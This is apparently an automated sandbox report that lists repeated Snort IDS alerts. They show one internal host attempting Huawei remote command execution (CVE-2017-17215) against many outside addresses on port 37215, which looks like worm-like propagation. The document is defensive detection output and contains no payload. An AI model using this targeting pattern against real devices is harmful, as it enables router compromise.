              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48922 -> 188.112.233.201:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45766 -> 197.72.165.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45766 -> 197.72.165.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45906 -> 157.244.76.128:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45906 -> 157.244.76.128:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34148 -> 157.12.171.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34148 -> 157.12.171.34:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44528 -> 41.139.74.88:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44528 -> 41.139.74.88:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51716 -> 41.150.112.232:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51716 -> 41.150.112.232:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41046 -> 197.45.113.139:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41046 -> 197.45.113.139:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35632 -> 157.43.196.210:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35632 -> 157.43.196.210:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56004 -> 41.121.243.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56004 -> 41.121.243.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35046 -> 67.107.171.205:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35046 -> 67.107.171.205:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33984 -> 157.10.179.153:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33984 -> 157.10.179.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55976 -> 157.23.5.235:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55976 -> 157.23.5.235:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44020 -> 197.22.9.203:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44020 -> 197.22.9.203:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43988 -> 42.93.122.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43988 -> 42.93.122.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34638 -> 197.176.135.67:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34638 -> 197.176.135.67:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33318 -> 197.232.84.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33318 -> 197.232.84.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48080 -> 157.115.244.148:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48080 -> 157.115.244.148:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54362 -> 157.225.119.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54362 -> 157.225.119.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56860 -> 20.247.172.26:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56860 -> 20.247.172.26:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58954 -> 209.1.89.41:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58954 -> 209.1.89.41:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54602 -> 41.46.83.249:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54602 -> 41.46.83.249:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47642 -> 197.110.111.3:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47642 -> 197.110.111.3:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59712 -> 41.37.237.89:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59712 -> 41.37.237.89:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48496 -> 197.212.93.148:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48496 -> 197.212.93.148:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52102 -> 197.147.159.162:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52102 -> 197.147.159.162:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45238 -> 197.84.122.192:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45238 -> 197.84.122.192:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50506 -> 157.83.112.170:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50506 -> 157.83.112.170:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45922 -> 157.182.232.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45922 -> 157.182.232.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60138 -> 41.131.53.7:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60138 -> 41.131.53.7:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48918 -> 146.20.124.58:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48918 -> 146.20.124.58:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35536 -> 52.239.241.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35536 -> 52.239.241.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51478 -> 85.15.154.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51478 -> 85.15.154.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49026 -> 157.27.94.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49026 -> 157.27.94.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53746 -> 197.102.163.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53746 -> 197.102.163.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50766 -> 41.216.124.177:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50766 -> 41.216.124.177:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42026 -> 197.137.252.35:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42026 -> 197.137.252.35:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57398 -> 41.130.130.98:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57398 -> 41.130.130.98:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40690 -> 81.104.28.150:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40690 -> 81.104.28.150:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60176 -> 157.229.243.144:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60176 -> 157.229.243.144:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54018 -> 41.16.110.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54018 -> 41.16.110.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56636 -> 197.74.215.66:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56636 -> 197.74.215.66:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36238 -> 197.1.229.4:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36238 -> 197.1.229.4:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45760 -> 41.140.34.147:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45760 -> 41.140.34.147:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50214 -> 142.96.28.208:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50214 -> 142.96.28.208:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42228 -> 186.132.128.20:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42228 -> 186.132.128.20:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49868 -> 41.166.60.80:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49868 -> 41.166.60.80:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44748 -> 197.213.248.168:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44748 -> 197.213.248.168:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43668 -> 41.177.231.237:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43668 -> 41.177.231.237:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35284 -> 157.176.143.215:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35284 -> 157.176.143.215:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51416 -> 197.219.157.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51416 -> 197.219.157.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47336 -> 157.230.184.103:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47336 -> 157.230.184.103:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37658 -> 157.165.76.48:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37658 -> 157.165.76.48:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53782 -> 41.34.102.172:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53782 -> 41.34.102.172:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48038 -> 197.130.72.78:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48038 -> 197.130.72.78:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60458 -> 74.34.228.195:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60458 -> 74.34.228.195:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36676 -> 157.225.11.175:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36676 -> 157.225.11.175:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49308 -> 41.239.95.1:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49308 -> 41.239.95.1:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45388 -> 197.239.161.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45388 -> 197.239.161.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60552 -> 197.196.83.26:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60552 -> 197.196.83.26:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43618 -> 41.198.15.79:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43618 -> 41.198.15.79:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47076 -> 41.197.68.97:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47076 -> 41.197.68.97:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59990 -> 41.1.71.197:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59990 -> 41.1.71.197:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43270 -> 157.236.132.49:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43270 -> 157.236.132.49:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53414 -> 197.51.163.251:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53414 -> 197.51.163.251:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45886 -> 41.175.203.101:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45886 -> 41.175.203.101:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60372 -> 157.4.205.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60372 -> 157.4.205.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44550 -> 157.69.235.3:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44550 -> 157.69.235.3:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46096 -> 157.119.207.182:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46096 -> 157.119.207.182:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36324 -> 157.10.162.238:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36324 -> 157.10.162.238:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43864 -> 84.35.213.6:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43864 -> 84.35.213.6:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33110 -> 41.95.10.5:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33110 -> 41.95.10.5:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56500 -> 157.71.191.102:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56500 -> 157.71.191.102:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40146 -> 41.132.97.193:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40146 -> 41.132.97.193:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33876 -> 157.239.199.26:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33876 -> 157.239.199.26:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35166 -> 157.55.220.62:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35166 -> 157.55.220.62:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35244 -> 157.122.145.169:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35244 -> 157.122.145.169:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37828 -> 157.224.9.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37828 -> 157.224.9.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37986 -> 157.78.75.155:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37986 -> 157.78.75.155:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46182 -> 157.186.208.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46182 -> 157.186.208.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58500 -> 178.81.228.8:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58500 -> 178.81.228.8:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37700 -> 102.214.5.194:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37700 -> 102.214.5.194:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55914 -> 157.64.143.202:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55914 -> 157.64.143.202:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49910 -> 157.232.22.196:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49910 -> 157.232.22.196:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38640 -> 157.71.166.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38640 -> 157.71.166.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44444 -> 157.236.255.241:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44444 -> 157.236.255.241:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42610 -> 61.172.8.192:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42610 -> 61.172.8.192:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43744 -> 66.163.114.53:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43744 -> 66.163.114.53:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38216 -> 197.237.162.28:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38216 -> 197.237.162.28:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40700 -> 157.217.148.142:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40700 -> 157.217.148.142:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55192 -> 197.222.232.102:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55192 -> 197.222.232.102:37215
